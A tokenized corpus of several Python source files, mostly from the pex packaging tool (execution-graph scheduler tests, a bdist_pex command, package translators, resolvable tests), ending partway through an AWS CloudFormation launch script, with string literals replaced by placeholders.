"<STR_LIT:B>" , "<STR_LIT:A>" ] ) <EOL> def test_simple_binary_tree ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ "<STR_LIT:B>" , "<STR_LIT:C>" ] ) , <EOL> self . job ( "<STR_LIT:B>" , passing_fn , [ ] ) , <EOL> self . job ( "<STR_LIT:C>" , passing_fn , [ ] ) ] ) <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( self . jobs_run , [ "<STR_LIT:B>" , "<STR_LIT:C>" , "<STR_LIT:A>" ] ) <EOL> def test_simple_linear_dependencies ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ "<STR_LIT:B>" ] ) , <EOL> self . job ( "<STR_LIT:B>" , passing_fn , [ "<STR_LIT:C>" ] ) , <EOL> self . job ( "<STR_LIT:C>" , passing_fn , [ ] ) ] ) <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( self . jobs_run , [ "<STR_LIT:C>" , "<STR_LIT:B>" , "<STR_LIT:A>" ] ) <EOL> def test_simple_unconnected ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ ] ) , <EOL> self . job ( "<STR_LIT:B>" , passing_fn , [ ] ) , <EOL> ] ) <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( self . jobs_run , [ "<STR_LIT:A>" , "<STR_LIT:B>" ] ) <EOL> def test_simple_unconnected_tree ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ "<STR_LIT:B>" ] ) , <EOL> self . job ( "<STR_LIT:B>" , passing_fn , [ ] ) , <EOL> self . job ( "<STR_LIT:C>" , passing_fn , [ ] ) , <EOL> ] ) <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( self . jobs_run , [ "<STR_LIT:B>" , "<STR_LIT:C>" , "<STR_LIT:A>" ] ) <EOL> def test_dependee_depends_on_dependency_of_its_dependency ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ "<STR_LIT:B>" , "<STR_LIT:C>" ] ) , <EOL> self . job ( "<STR_LIT:B>" , passing_fn , [ "<STR_LIT:C>" ] ) , <EOL> self . job ( "<STR_LIT:C>" , passing_fn , [ ] ) , <EOL> ] ) <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( [ "<STR_LIT:C>" , "<STR_LIT:B>" , "<STR_LIT:A>" ] , self . jobs_run ) <EOL> def test_one_failure_raises_exception ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , raising_fn , [ ] ) ] ) <EOL> with self . assertRaises ( ExecutionFailure ) as cm : <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cm . exception ) ) <EOL> def test_failure_of_dependency_does_not_run_dependents ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ "<STR_LIT:F>" ] ) , <EOL> self . job ( "<STR_LIT:F>" , raising_fn , [ ] ) ] ) <EOL> with self . assertRaises ( ExecutionFailure ) as cm : <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( [ "<STR_LIT:F>" ] , self . jobs_run ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cm . exception ) ) <EOL> def test_failure_of_dependency_does_not_run_second_order_dependents ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ "<STR_LIT:B>" ] ) , <EOL> self . job ( "<STR_LIT:B>" , passing_fn , [ "<STR_LIT:F>" ] ) , <EOL> self . job ( "<STR_LIT:F>" , raising_fn , [ ] ) ] ) <EOL> with self . assertRaises ( ExecutionFailure ) as cm : <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( [ "<STR_LIT:F>" ] , self . jobs_run ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cm . exception ) ) <EOL> def test_failure_of_one_leg_of_tree_does_not_cancel_other ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:B>" , passing_fn , [ ] ) , <EOL> self . job ( "<STR_LIT:F>" , raising_fn , [ "<STR_LIT:B>" ] ) , <EOL> self . job ( "<STR_LIT:A>" , passing_fn , [ "<STR_LIT:B>" ] ) ] ) <EOL> with self . assertRaises ( ExecutionFailure ) as cm : <EOL> self . execute ( exec_graph ) <EOL> self . assertTrue ( self . jobs_run == [ "<STR_LIT:B>" , "<STR_LIT:F>" , "<STR_LIT:A>" ] or self . jobs_run == [ "<STR_LIT:B>" , "<STR_LIT:A>" , "<STR_LIT:F>" ] ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cm . exception ) ) <EOL> def test_failure_of_disconnected_job_does_not_cancel_non_dependents ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ ] ) , <EOL> self . job ( "<STR_LIT:F>" , raising_fn , [ ] ) ] ) <EOL> with self . assertRaises ( ExecutionFailure ) : <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( [ "<STR_LIT:A>" , "<STR_LIT:F>" ] , self . jobs_run ) <EOL> def test_cycle_in_graph_causes_failure ( self ) : <EOL> with self . assertRaises ( NoRootJobError ) as cm : <EOL> ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ "<STR_LIT:B>" ] ) , <EOL> self . job ( "<STR_LIT:B>" , passing_fn , [ "<STR_LIT:A>" ] ) ] ) <EOL> self . assertEqual ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> str ( cm . exception ) ) <EOL> def test_non_existent_dependency_causes_failure ( self ) : <EOL> with self . assertRaises ( UnknownJobError ) as cm : <EOL> ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ ] ) , <EOL> self . job ( "<STR_LIT:B>" , passing_fn , [ "<STR_LIT>" ] ) ] ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cm . exception ) ) <EOL> def test_on_success_callback_raises_error ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ ] , on_success = raising_fn ) ] ) <EOL> with self . assertRaises ( ExecutionFailure ) as cm : <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cm . exception ) ) <EOL> def test_on_failure_callback_raises_error ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , raising_fn , [ ] , on_failure = raising_fn ) ] ) <EOL> with self . assertRaises ( ExecutionFailure ) as cm : <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cm . exception ) ) <EOL> def test_same_key_scheduled_twice_is_error ( self ) : <EOL> with self . assertRaises ( JobExistsError ) as cm : <EOL> ExecutionGraph ( [ self . job ( "<STR_LIT>" , passing_fn , [ ] ) , <EOL> self . job ( "<STR_LIT>" , passing_fn , [ ] ) ] ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cm . exception ) ) <EOL> def test_priorities_for_chain_of_jobs ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ ] , <NUM_LIT:8> ) , <EOL> self . job ( "<STR_LIT:B>" , passing_fn , [ "<STR_LIT:A>" ] , <NUM_LIT:4> ) , <EOL> self . job ( "<STR_LIT:C>" , passing_fn , [ "<STR_LIT:B>" ] , <NUM_LIT:2> ) , <EOL> self . job ( "<STR_LIT:D>" , passing_fn , [ "<STR_LIT:C>" ] , <NUM_LIT:1> ) ] ) <EOL> self . assertEqual ( exec_graph . _job_priority , { "<STR_LIT:A>" : <NUM_LIT:15> , "<STR_LIT:B>" : <NUM_LIT:7> , "<STR_LIT:C>" : <NUM_LIT:3> , "<STR_LIT:D>" : <NUM_LIT:1> } ) <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( self . jobs_run , [ "<STR_LIT:A>" , "<STR_LIT:B>" , "<STR_LIT:C>" , "<STR_LIT:D>" ] ) <EOL> def test_priorities_for_fork ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ ] , <NUM_LIT:4> ) , <EOL> self . job ( "<STR_LIT:B>" , passing_fn , [ "<STR_LIT:A>" ] , <NUM_LIT:2> ) , <EOL> self . job ( "<STR_LIT:C>" , passing_fn , [ "<STR_LIT:A>" ] , <NUM_LIT:1> ) ] ) <EOL> self . assertEqual ( exec_graph . _job_priority , { "<STR_LIT:A>" : <NUM_LIT:6> , "<STR_LIT:B>" : <NUM_LIT:2> , "<STR_LIT:C>" : <NUM_LIT:1> } ) <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( self . jobs_run , [ "<STR_LIT:A>" , "<STR_LIT:B>" , "<STR_LIT:C>" ] ) <EOL> def test_priorities_for_mirrored_fork ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ ] , <NUM_LIT:4> ) , <EOL> self . job ( "<STR_LIT:B>" , passing_fn , [ "<STR_LIT:A>" ] , <NUM_LIT:1> ) , <EOL> self . job ( "<STR_LIT:C>" , passing_fn , [ "<STR_LIT:A>" ] , <NUM_LIT:2> ) ] ) <EOL> self . assertEqual ( exec_graph . _job_priority , { "<STR_LIT:A>" : <NUM_LIT:6> , "<STR_LIT:B>" : <NUM_LIT:1> , "<STR_LIT:C>" : <NUM_LIT:2> } ) <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( self . jobs_run , [ "<STR_LIT:A>" , "<STR_LIT:C>" , "<STR_LIT:B>" ] ) <EOL> def test_priorities_for_diamond ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ ] , <NUM_LIT:8> ) , <EOL> self . job ( "<STR_LIT:B>" , passing_fn , [ "<STR_LIT:A>" ] , <NUM_LIT:4> ) , <EOL> self . job ( "<STR_LIT:C>" , passing_fn , [ "<STR_LIT:A>" ] , <NUM_LIT:2> ) , <EOL> self . job ( "<STR_LIT:D>" , passing_fn , [ "<STR_LIT:B>" , "<STR_LIT:C>" ] , <NUM_LIT:1> ) ] ) <EOL> self . assertEqual ( exec_graph . _job_priority , { "<STR_LIT:A>" : <NUM_LIT> , "<STR_LIT:B>" : <NUM_LIT:5> , "<STR_LIT:C>" : <NUM_LIT:3> , "<STR_LIT:D>" : <NUM_LIT:1> } ) <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( self . jobs_run , [ "<STR_LIT:A>" , "<STR_LIT:B>" , "<STR_LIT:C>" , "<STR_LIT:D>" ] ) <EOL> def test_priorities_for_mirrored_diamond ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ ] , <NUM_LIT:8> ) , <EOL> self . job ( "<STR_LIT:B>" , passing_fn , [ "<STR_LIT:A>" ] , <NUM_LIT:2> ) , <EOL> self . job ( "<STR_LIT:C>" , passing_fn , [ "<STR_LIT:A>" ] , <NUM_LIT:4> ) , <EOL> self . job ( "<STR_LIT:D>" , passing_fn , [ "<STR_LIT:B>" , "<STR_LIT:C>" ] , <NUM_LIT:1> ) ] ) <EOL> self . assertEqual ( exec_graph . _job_priority , { "<STR_LIT:A>" : <NUM_LIT> , "<STR_LIT:B>" : <NUM_LIT:3> , "<STR_LIT:C>" : <NUM_LIT:5> , "<STR_LIT:D>" : <NUM_LIT:1> } ) <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( self . jobs_run , [ "<STR_LIT:A>" , "<STR_LIT:C>" , "<STR_LIT:B>" , "<STR_LIT:D>" ] ) <EOL> def test_priorities_for_skewed_diamond ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ ] , <NUM_LIT:1> ) , <EOL> self . job ( "<STR_LIT:B>" , passing_fn , [ "<STR_LIT:A>" ] , <NUM_LIT:2> ) , <EOL> self . job ( "<STR_LIT:C>" , passing_fn , [ "<STR_LIT:B>" ] , <NUM_LIT:4> ) , <EOL> self . job ( "<STR_LIT:D>" , passing_fn , [ "<STR_LIT:A>" ] , <NUM_LIT:8> ) , <EOL> self . job ( "<STR_LIT:E>" , passing_fn , [ "<STR_LIT:C>" , "<STR_LIT:D>" ] , <NUM_LIT:16> ) ] ) <EOL> self . assertEqual ( exec_graph . _job_priority , { "<STR_LIT:A>" : <NUM_LIT> , "<STR_LIT:B>" : <NUM_LIT> , "<STR_LIT:C>" : <NUM_LIT:20> , "<STR_LIT:D>" : <NUM_LIT> , "<STR_LIT:E>" : <NUM_LIT:16> } ) <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( self . jobs_run , [ "<STR_LIT:A>" , "<STR_LIT:D>" , "<STR_LIT:B>" , "<STR_LIT:C>" , "<STR_LIT:E>" ] ) <EOL> def test_jobs_not_canceled_multiple_times ( self ) : <EOL> failures = list ( ) <EOL> def collect_failure ( jobname ) : <EOL> def fn ( ) : <EOL> failures . append ( jobname ) <EOL> return fn <EOL> def my_job ( name , result_fn , deps ) : <EOL> return self . job ( name , result_fn , deps , <NUM_LIT:1> , on_failure = collect_failure ( name ) ) <EOL> exec_graph = ExecutionGraph ( [ my_job ( '<STR_LIT:A>' , raising_fn , [ ] ) , <EOL> my_job ( '<STR_LIT>' , passing_fn , [ '<STR_LIT:A>' ] ) , <EOL> my_job ( '<STR_LIT>' , passing_fn , [ '<STR_LIT:A>' ] ) , <EOL> my_job ( '<STR_LIT>' , passing_fn , [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> my_job ( '<STR_LIT>' , passing_fn , [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> my_job ( '<STR_LIT:E>' , passing_fn , [ '<STR_LIT>' ] ) ] ) <EOL> with self . assertRaises ( ExecutionFailure ) : <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( self . jobs_run , [ '<STR_LIT:A>' ] ) <EOL> self . assertEqual ( failures , [ '<STR_LIT:A>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:E>' ] ) </s>
<s> import os <EOL> from distutils import log <EOL> from setuptools import Command <EOL> from pex . bin . pex import build_pex , configure_clp <EOL> from pex . common import die <EOL> from pex . compatibility import ConfigParser , StringIO , string <EOL> from pex . variables import ENV <EOL> class bdist_pex ( Command ) : <EOL> description = "<STR_LIT>" <EOL> user_options = [ <EOL> ( '<STR_LIT>' , None , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , None , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , None , '<STR_LIT>' ) , <EOL> ] <EOL> boolean_options = [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> def initialize_options ( self ) : <EOL> self . bdist_all = False <EOL> self . bdist_dir = None <EOL> self . pex_args = '<STR_LIT>' <EOL> def finalize_options ( self ) : <EOL> self . pex_args = self . pex_args . split ( ) <EOL> def _write ( self , pex_builder , target , script = None ) : <EOL> builder = pex_builder . clone ( ) <EOL> if script is not None : <EOL> builder . set_script ( script ) <EOL> builder . build ( target ) <EOL> def parse_entry_points ( self ) : <EOL> def split_and_strip ( entry_point ) : <EOL> console_script , entry_point = entry_point . split ( '<STR_LIT:=>' , <NUM_LIT:2> ) <EOL> return console_script . strip ( ) , entry_point . strip ( ) <EOL> raw_entry_points = self . distribution . entry_points <EOL> if isinstance ( raw_entry_points , string ) : <EOL> parser = ConfigParser ( ) <EOL> parser . readfp ( StringIO ( raw_entry_points ) ) <EOL> if parser . has_section ( '<STR_LIT>' ) : <EOL> return dict ( parser . items ( '<STR_LIT>' ) ) <EOL> elif isinstance ( raw_entry_points , dict ) : <EOL> try : <EOL> return dict ( split_and_strip ( script ) <EOL> for script in raw_entry_points . get ( '<STR_LIT>' , [ ] ) ) <EOL> except ValueError : <EOL> pass <EOL> elif raw_entry_points is not None : <EOL> die ( '<STR_LIT>' ) <EOL> return { } <EOL> def run ( self ) : <EOL> name = self . distribution . get_name ( ) <EOL> version = self . distribution . get_version ( ) <EOL> parser , options_builder = configure_clp ( ) <EOL> package_dir = os . path . dirname ( os . path . realpath ( os . path . expanduser ( <EOL> self . distribution . script_name ) ) ) <EOL> if self . bdist_dir is None : <EOL> self . bdist_dir = os . path . join ( package_dir , '<STR_LIT>' ) <EOL> options , reqs = parser . parse_args ( self . pex_args ) <EOL> if options . entry_point or options . script : <EOL> die ( '<STR_LIT>' ) <EOL> reqs = [ package_dir ] + reqs <EOL> with ENV . patch ( PEX_VERBOSE = str ( options . verbosity ) , PEX_ROOT = options . pex_root ) : <EOL> pex_builder = build_pex ( reqs , options , options_builder ) <EOL> console_scripts = self . parse_entry_points ( ) <EOL> target = os . path . join ( self . bdist_dir , name + '<STR_LIT:->' + version + '<STR_LIT>' ) <EOL> if self . bdist_all : <EOL> for script_name in console_scripts : <EOL> target = os . path . join ( self . bdist_dir , script_name ) <EOL> log . info ( '<STR_LIT>' % ( script_name , target ) ) <EOL> self . _write ( pex_builder , target , script = script_name ) <EOL> elif name in console_scripts : <EOL> log . info ( '<STR_LIT>' % ( name , target ) ) <EOL> self . _write ( pex_builder , target , script = name ) <EOL> else : <EOL> log . info ( '<STR_LIT>' % target ) <EOL> self . _write ( pex_builder , target , script = None ) </s>
<s> from __future__ import absolute_import <EOL> import os <EOL> import traceback <EOL> from abc import abstractmethod <EOL> from . archiver import Archiver <EOL> from . common import chmod_plus_w , safe_copy , safe_mkdtemp , safe_rmtree <EOL> from . compatibility import AbstractClass <EOL> from . installer import WheelInstaller <EOL> from . interpreter import PythonInterpreter <EOL> from . package import EggPackage , Package , SourcePackage , WheelPackage <EOL> from . platforms import Platform <EOL> from . tracer import TRACER <EOL> from . util import DistributionHelper <EOL> class TranslatorBase ( AbstractClass ) : <EOL> """<STR_LIT>""" <EOL> @ abstractmethod <EOL> def translate ( self , link , into = None ) : <EOL> pass <EOL> class ChainedTranslator ( TranslatorBase ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * translators ) : <EOL> self . _translators = list ( filter ( None , translators ) ) <EOL> for tx in self . _translators : <EOL> if not isinstance ( tx , TranslatorBase ) : <EOL> raise ValueError ( '<STR_LIT>' % type ( tx ) ) <EOL> def translate ( self , package , into = None ) : <EOL> for tx in self . _translators : <EOL> dist = tx . translate ( package , into = into ) <EOL> if dist : <EOL> return dist <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> '<STR_LIT:U+002CU+0020>' . join ( ( tx . __class__ . __name__ for tx in self . _translators ) ) ) <EOL> class SourceTranslator ( TranslatorBase ) : <EOL> @ classmethod <EOL> def run_2to3 ( cls , path ) : <EOL> from lib2to3 . refactor import get_fixers_from_package , RefactoringTool <EOL> rt = RefactoringTool ( get_fixers_from_package ( '<STR_LIT>' ) ) <EOL> with TRACER . timed ( '<STR_LIT>' % path ) : <EOL> for root , dirs , files in os . walk ( path ) : <EOL> for fn in files : <EOL> full_fn = os . path . join ( root , fn ) <EOL> if full_fn . endswith ( '<STR_LIT>' ) : <EOL> with TRACER . timed ( '<STR_LIT:%s>' % fn , V = <NUM_LIT:3> ) : <EOL> try : <EOL> chmod_plus_w ( full_fn ) <EOL> rt . refactor_file ( full_fn , write = True ) <EOL> except IOError : <EOL> TRACER . log ( '<STR_LIT>' % fn ) <EOL> TRACER . log ( traceback . format_exc ( ) ) <EOL> def __init__ ( self , <EOL> interpreter = PythonInterpreter . get ( ) , <EOL> platform = Platform . current ( ) , <EOL> use_2to3 = False , <EOL> installer_impl = WheelInstaller ) : <EOL> self . _interpreter = interpreter <EOL> self . _installer_impl = installer_impl <EOL> self . _use_2to3 = use_2to3 <EOL> self . _platform = platform <EOL> def translate ( self , package , into = None ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( package , SourcePackage ) : <EOL> return None <EOL> if not package . local : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> installer = None <EOL> version = self . _interpreter . version <EOL> unpack_path = Archiver . unpack ( package . local_path ) <EOL> into = into or safe_mkdtemp ( ) <EOL> try : <EOL> if self . _use_2to3 and version >= ( <NUM_LIT:3> , ) : <EOL> with TRACER . timed ( '<STR_LIT>' % package . name ) : <EOL> self . run_2to3 ( unpack_path ) <EOL> installer = self . _installer_impl ( <EOL> unpack_path , <EOL> interpreter = self . _interpreter , <EOL> strict = ( package . name not in ( '<STR_LIT>' , '<STR_LIT>' ) ) ) <EOL> with TRACER . timed ( '<STR_LIT>' % package . name ) : <EOL> try : <EOL> dist_path = installer . bdist ( ) <EOL> except self . _installer_impl . InstallFailure as e : <EOL> TRACER . log ( '<STR_LIT>' % ( unpack_path , e ) ) <EOL> return None <EOL> target_path = os . path . join ( into , os . path . basename ( dist_path ) ) <EOL> safe_copy ( dist_path , target_path ) <EOL> target_package = Package . from_href ( target_path ) <EOL> if not target_package : <EOL> TRACER . log ( '<STR_LIT>' % target_path ) <EOL> return None <EOL> if not target_package . compatible ( self . _interpreter . identity , platform = self . _platform ) : <EOL> TRACER . log ( '<STR_LIT>' % ( <EOL> target_package , self . _interpreter . identity , self . _platform ) ) <EOL> return None <EOL> return DistributionHelper . distribution_from_path ( target_path ) <EOL> except Exception as e : <EOL> TRACER . log ( '<STR_LIT>' % package ) <EOL> TRACER . log ( traceback . format_exc ( ) ) <EOL> finally : <EOL> if installer : <EOL> installer . cleanup ( ) <EOL> if unpack_path : <EOL> safe_rmtree ( unpack_path ) <EOL> class BinaryTranslator ( TranslatorBase ) : <EOL> def __init__ ( self , <EOL> package_type , <EOL> interpreter = PythonInterpreter . get ( ) , <EOL> platform = Platform . current ( ) ) : <EOL> self . _package_type = package_type <EOL> self . _platform = platform <EOL> self . _identity = interpreter . identity <EOL> def translate ( self , package , into = None ) : <EOL> """<STR_LIT>""" <EOL> if not package . local : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if not isinstance ( package , self . _package_type ) : <EOL> return None <EOL> if not package . compatible ( identity = self . _identity , platform = self . _platform ) : <EOL> TRACER . log ( '<STR_LIT>' % ( <EOL> package , self . _identity , self . _platform ) ) <EOL> return None <EOL> into = into or safe_mkdtemp ( ) <EOL> target_path = os . path . join ( into , package . filename ) <EOL> safe_copy ( package . local_path , target_path ) <EOL> return DistributionHelper . distribution_from_path ( target_path ) <EOL> class EggTranslator ( BinaryTranslator ) : <EOL> def __init__ ( self , ** kw ) : <EOL> super ( EggTranslator , self ) . __init__ ( EggPackage , ** kw ) <EOL> class WheelTranslator ( BinaryTranslator ) : <EOL> def __init__ ( self , ** kw ) : <EOL> super ( WheelTranslator , self ) . __init__ ( WheelPackage , ** kw ) <EOL> class Translator ( object ) : <EOL> @ staticmethod <EOL> def default ( platform = Platform . current ( ) , interpreter = None ) : <EOL> interpreter = interpreter or PythonInterpreter . get ( ) <EOL> whl_translator = WheelTranslator ( platform = platform , interpreter = interpreter ) <EOL> egg_translator = EggTranslator ( platform = platform , interpreter = interpreter ) <EOL> source_translator = SourceTranslator ( platform = platform , interpreter = interpreter ) <EOL> return ChainedTranslator ( whl_translator , egg_translator , source_translator ) </s>
<s> import pkg_resources <EOL> import pytest <EOL> from pex . iterator import Iterator <EOL> from pex . package import Package , SourcePackage <EOL> from pex . resolvable import ( <EOL> Resolvable , <EOL> ResolvableDirectory , <EOL> ResolvablePackage , <EOL> ResolvableRepository , <EOL> ResolvableRequirement , <EOL> resolvables_from_iterable <EOL> ) <EOL> from pex . resolver_options import ResolverOptionsBuilder <EOL> from pex . testing import make_source_dir <EOL> try : <EOL> from unittest import mock <EOL> except ImportError : <EOL> import mock <EOL> def test_resolvable_package ( ) : <EOL> builder = ResolverOptionsBuilder ( ) <EOL> source_name = '<STR_LIT>' <EOL> pkg = SourcePackage . from_href ( source_name ) <EOL> resolvable = ResolvablePackage . from_string ( source_name , builder ) <EOL> assert resolvable . packages ( ) == [ pkg ] <EOL> mock_iterator = mock . create_autospec ( Iterator , spec_set = True ) <EOL> mock_iterator . iter . return_value = iter ( [ ] ) <EOL> assert resolvable . compatible ( mock_iterator ) == [ ] <EOL> assert mock_iterator . iter . mock_calls == [ ] <EOL> assert resolvable . name == '<STR_LIT:foo>' <EOL> assert resolvable . exact is True <EOL> assert resolvable . extras ( ) == [ ] <EOL> resolvable = ResolvablePackage . from_string ( source_name + '<STR_LIT>' , builder ) <EOL> assert resolvable . extras ( ) == [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> assert Resolvable . get ( '<STR_LIT>' ) == ResolvablePackage . from_string ( <EOL> '<STR_LIT>' , builder ) <EOL> with pytest . raises ( ResolvablePackage . InvalidRequirement ) : <EOL> ResolvablePackage . from_string ( '<STR_LIT:foo>' , builder ) <EOL> def test_resolvable_repository ( ) : <EOL> with pytest . raises ( Resolvable . InvalidRequirement ) : <EOL> ResolvableRepository . from_string ( '<STR_LIT>' , <EOL> ResolverOptionsBuilder ( ) ) <EOL> def test_resolvable_requirement ( ) : <EOL> req = '<STR_LIT>' <EOL> resolvable = ResolvableRequirement . from_string ( req , ResolverOptionsBuilder ( fetchers = [ ] ) ) <EOL> assert resolvable . requirement == pkg_resources . Requirement . parse ( '<STR_LIT>' ) <EOL> assert resolvable . name == '<STR_LIT:foo>' <EOL> assert resolvable . exact is True <EOL> assert resolvable . extras ( ) == [ '<STR_LIT:bar>' ] <EOL> assert resolvable . options . _fetchers == [ ] <EOL> assert resolvable . packages ( ) == [ ] <EOL> source_pkg = SourcePackage . from_href ( '<STR_LIT>' ) <EOL> mock_iterator = mock . create_autospec ( Iterator , spec_set = True ) <EOL> mock_iterator . iter . return_value = iter ( [ source_pkg ] ) <EOL> assert resolvable . compatible ( mock_iterator ) == [ source_pkg ] <EOL> assert mock_iterator . iter . mock_calls == [ <EOL> mock . call ( pkg_resources . Requirement . parse ( '<STR_LIT>' ) ) ] <EOL> resolvable = ResolvableRequirement . from_string ( '<STR_LIT:foo>' , ResolverOptionsBuilder ( ) ) <EOL> assert resolvable . exact is False <EOL> assert Resolvable . get ( '<STR_LIT:foo>' ) == ResolvableRequirement . from_string ( <EOL> '<STR_LIT:foo>' , ResolverOptionsBuilder ( ) ) <EOL> def test_resolvable_directory ( ) : <EOL> builder = ResolverOptionsBuilder ( ) <EOL> with make_source_dir ( name = '<STR_LIT>' ) as td : <EOL> rdir = ResolvableDirectory . from_string ( td , builder ) <EOL> assert rdir . name == pkg_resources . safe_name ( '<STR_LIT>' ) <EOL> assert rdir . extras ( ) == [ ] <EOL> rdir = ResolvableDirectory . from_string ( td + '<STR_LIT>' , builder ) <EOL> assert rdir . name == pkg_resources . safe_name ( '<STR_LIT>' ) <EOL> assert rdir . extras ( ) == [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def test_resolvables_from_iterable ( ) : <EOL> builder = ResolverOptionsBuilder ( ) <EOL> reqs = [ <EOL> '<STR_LIT:foo>' , <EOL> Package . from_href ( '<STR_LIT>' ) , <EOL> pkg_resources . Requirement . parse ( '<STR_LIT>' ) , <EOL> ] <EOL> resolved_reqs = list ( resolvables_from_iterable ( reqs , builder ) ) <EOL> assert resolved_reqs == [ <EOL> ResolvableRequirement . from_string ( '<STR_LIT:foo>' , builder ) , <EOL> ResolvablePackage . from_string ( '<STR_LIT>' , builder ) , <EOL> ResolvableRequirement . from_string ( '<STR_LIT>' , builder ) , <EOL> ] </s>
<s> from stormed . method . codegen import id2class </s>
<s> """<STR_LIT>""" <EOL> import datetime <EOL> import glob <EOL> import json <EOL> import os <EOL> import sys <EOL> import boto3 <EOL> import yaml <EOL> import tags <EOL> from cfn_pyplates import core <EOL> from cfn_pyplates import functions <EOL> class ConfigError ( Exception ) : <EOL> pass <EOL> def main ( ) : <EOL> config = load_config ( ) <EOL> derive_config ( config ) <EOL> unique_suffix = datetime . datetime . utcnow ( ) . strftime ( "<STR_LIT>" ) <EOL> commit = os . popen ( """<STR_LIT>""" ) . read ( ) . rstrip ( ) <EOL> assert commit <EOL> assert "<STR_LIT:'>" not in config [ '<STR_LIT>' ] <EOL> instance_tags = tags . load ( ) <EOL> instance_tags . append ( { '<STR_LIT>' : '<STR_LIT:Name>' , <EOL> '<STR_LIT>' : "<STR_LIT>" + unique_suffix } ) <EOL> config [ '<STR_LIT>' ] = instance_tags <EOL> config_uri = save_s3_config ( config , unique_suffix ) <EOL> sys . stderr . write ( "<STR_LIT>" . format ( config_uri ) ) <EOL> user_data_script = functions . join ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , functions . ref ( "<STR_LIT>" ) , "<STR_LIT:\n>" , <EOL> "<STR_LIT>" , config [ '<STR_LIT>' ] , "<STR_LIT:\n>" , <EOL> "<STR_LIT>" , config [ '<STR_LIT>' ] , "<STR_LIT:\n>" , <EOL> "<STR_LIT>" , config [ '<STR_LIT>' ] , "<STR_LIT:\n>" , <EOL> "<STR_LIT>" , config [ '<STR_LIT>' ] , "<STR_LIT:\n>" , <EOL> "<STR_LIT>" , config [ '<STR_LIT>' ] , "<STR_LIT:\n>" , <EOL> "<STR_LIT>" , config [ '<STR_LIT>' ] , "<STR_LIT:\n>" , <EOL> "<STR_LIT>" , functions . ref ( '<STR_LIT>' ) , "<STR_LIT:\n>" , <EOL> "<STR_LIT>" , config [ '<STR_LIT>' ] , "<STR_LIT:\n>" , <EOL> "<STR_LIT>" , config [ '<STR_LIT>' ] , "<STR_LIT:\n>" , <EOL> "<STR_LIT>" , config [ '<STR_LIT>' ] , "<STR_LIT>" , <EOL> "<STR_LIT>" , commit , "<STR_LIT:\n>" , <EOL> "<STR_LIT:\n>" , <EOL> open ( '<STR_LIT>' ) . read 